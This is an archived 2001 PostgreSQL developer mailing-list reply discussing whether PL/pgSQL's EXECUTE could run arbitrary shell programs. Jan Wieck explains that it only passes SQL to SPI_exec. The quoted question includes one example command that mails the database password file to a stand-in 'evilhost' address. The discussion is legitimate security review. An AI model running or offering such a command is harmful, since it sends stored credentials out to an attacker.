Skip site navigation (1) Skip section navigation (2)

Re: Security hole in PL/pgSQL

From: Jan Wieck <janwieck(at)Yahoo(dot)com>
To: KuroiNeko <evpopkov(at)carrier(dot)kiev(dot)ua>
Cc: pgsql-hackers(at)postgresql(dot)org
Subject: Re: Security hole in PL/pgSQL
Date: 2001-01-29 18:16:03
Message-ID: 200101291816.NAA03906@jupiter.greatbridge.com (view raw or flat)
Thread:
Lists: pgsql-hackers
KuroiNeko wrote:
> > Huh? This would only be true if all operations inside plpgsql are
> > executed as superuser, which they are not. Seems to me the existing
> > defense against non-superuser using COPY is sufficient.
>
>  Sorry if I missed the point, but  if I got it right, Pl/Pgsql EXECUTE will
> allow execution of any program via exec*() call? If so, this will allow any
> (system) user to  execute arbitrary code as postgres  (system) user, right?
> If so, how can something like
>
> EXECUTE '/bin/mail badguy(at)evilhost < /usr/pgsql/data/pg_pwd';
>
>  be avioded?

    No,  EXECUTE  just passes a string down to SPI_exec() without
    trying to prepare and save an execution plan for it. It's not
    equivalent to system(3).


Jan

--

#======================================================================#
# It's easier to get forgiveness for being wrong than for being right. #
# Let's break this rule - forgive me.                                  #
#================================================== JanWieck(at)Yahoo(dot)com #



_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com


In response to

pgsql-hackers by date

Next:From: KuroiNekoDate: 2001-01-29 18:41:27
Subject: Re: Security hole in PL/pgSQL
Previous:From: Jan WieckDate: 2001-01-29 18:12:47
Subject: Re: [SQL] Re: BLOB HOWTO??

Privacy Policy | About PostgreSQL
Copyright © 1996-2014 The PostgreSQL Global Development Group